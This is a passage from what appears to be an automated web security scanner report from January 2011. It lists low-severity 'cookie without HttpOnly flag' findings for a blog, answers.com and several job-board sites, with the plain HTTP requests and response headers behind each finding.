Set-Cookie: PHPSESSID=a0f1qvin1rmg1u6sbvil1pk2c0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Last-Modified: Sat, 22 Jan 2011 00:17:07 GMT
Set-Cookie: wpgb_visit_last_php-default=1295655427; expires=Sun, 22-Jan-2012 00:17:07 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 93480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...

10.11. http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aharrisonbarnes.com
Path:   /do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:36 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=td5el2h9micq2p5p4knldobtl7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648498; expires=Sat, 21-Jan-2012 22:21:38 GMT; path=/
Link: <http://www.aharrisonbarnes.com/?p=1189>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 185016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="
...[SNIP]...

10.12. http://www.aharrisonbarnes.com/hb-course/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aharrisonbarnes.com
Path:   /hb-course/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hb-course/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:49 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=8o9prlskfceq1un5hq35vcpgi6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648510; expires=Sat, 21-Jan-2012 22:21:50 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...

10.13. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aharrisonbarnes.com
Path:   /push-yourself-outside-your-comfort-zone/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /push-yourself-outside-your-comfort-zone/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:38 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=5o76npmpltlll2h6khib1qgu27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648499; expires=Sat, 21-Jan-2012 22:21:39 GMT; path=/
Link: <http://www.aharrisonbarnes.com/?p=14138>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 141561


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="
...[SNIP]...

10.14. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aharrisonbarnes.com
Path:   /wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 22 Jan 2011 00:14:21 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dtob70g4f8pltdn39q5stffbl1; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Last-Modified: Sat, 22 Jan 2011 00:14:23 GMT
Set-Cookie: wpgb_visit_last_php-default=1295655263; expires=Sun, 22-Jan-2012 00:14:23 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 100571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...

10.15. http://www.answers.com/topic/vinson-elkins-llp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.answers.com
Path:   /topic/vinson-elkins-llp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/vinson-elkins-llp HTTP/1.1
Host: www.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:39:52 GMT
Server: AWS
Set-Cookie: lc=nt013; path=/; domain=www.answers.com; expires=Fri, 04-Feb-2011 18:39:52 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=05EA67FCD231E20FB8B1E7B8BD5DBA11; Path=/
Set-Cookie: settings=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Expires=Sat, 21-Jan-2012 18:39:52 GMT; Path=/
Set-Cookie: settingsS=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Path=/
Set-Cookie: afid=0; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: GNFirstVisit=1295635192020; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: tacodaSession=; Path=/
Set-Cookie: nafid=0; Path=/
Set-Cookie: referrerDomainSession=none; Path=/
Set-Cookie: firstPageTypeSession=topic-page; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 69874

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="IE IEnew IE7" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.
...[SNIP]...

10.16. http://www.architecturecrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.architecturecrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:50 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u8cdprgtig27p3jst5fgnvcol0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125304

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.17. http://www.attorneyresume.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.attorneyresume.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:24 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=3oi3tsj2agglmdtggh0p0r2jo5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80394

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="SHORTCUT ICON" href="http://www.attorneyresume.com/faviconar.ico">
<titl
...[SNIP]...

10.18. http://www.auditorcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.auditorcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16al60hefdulh9nl41fvb7adh1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125427

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.19. http://www.automotivecrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.automotivecrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=chphkc8gns7vn2rq112ej1g8s5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109012

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.20. http://www.aviationcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aviationcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ito8gdqrme71tdpjpbd47goi6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.21. http://www.bcgsearch.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bcgsearch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=f0h1k6bqv29tdb1vvdit6ua003; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31541

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<TITLE>Attorney Jobs, Law Jobs, Legal Jobs, Legal Recruiter, Legal Search Firm
...[SNIP]...

10.22. http://www.bcgsearch.com/browsejobs.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bcgsearch.com
Path:   /browsejobs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browsejobs.php HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 21 Jan 2011 19:34:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=2apfl02pmtrjbdcsqqnff0fmc3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
location: browsejob/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


10.23. http://www.bcgsearch.com/searchresults.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bcgsearch.com
Path:   /searchresults.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /searchresults.php HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=e0kuekof5a3ckuktgjpsc8gnp2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68543

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search
...[SNIP]...

10.24. http://www.bilingualcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bilingualcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3jv1797bk3m69qp27lbh4qrqj2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133153

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.25. http://www.biotechcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.biotechcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:05 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u6vsjargff90aq2r4fvrep9g90; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119741

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.26. http://www.bluecollarcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bluecollarcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:36 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=phn4e0vehg11att6t127knugu0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:36 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.27. http://www.businessanalystcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.businessanalystcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kldqa0cqamr0mp6anoh752e7o2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 124047

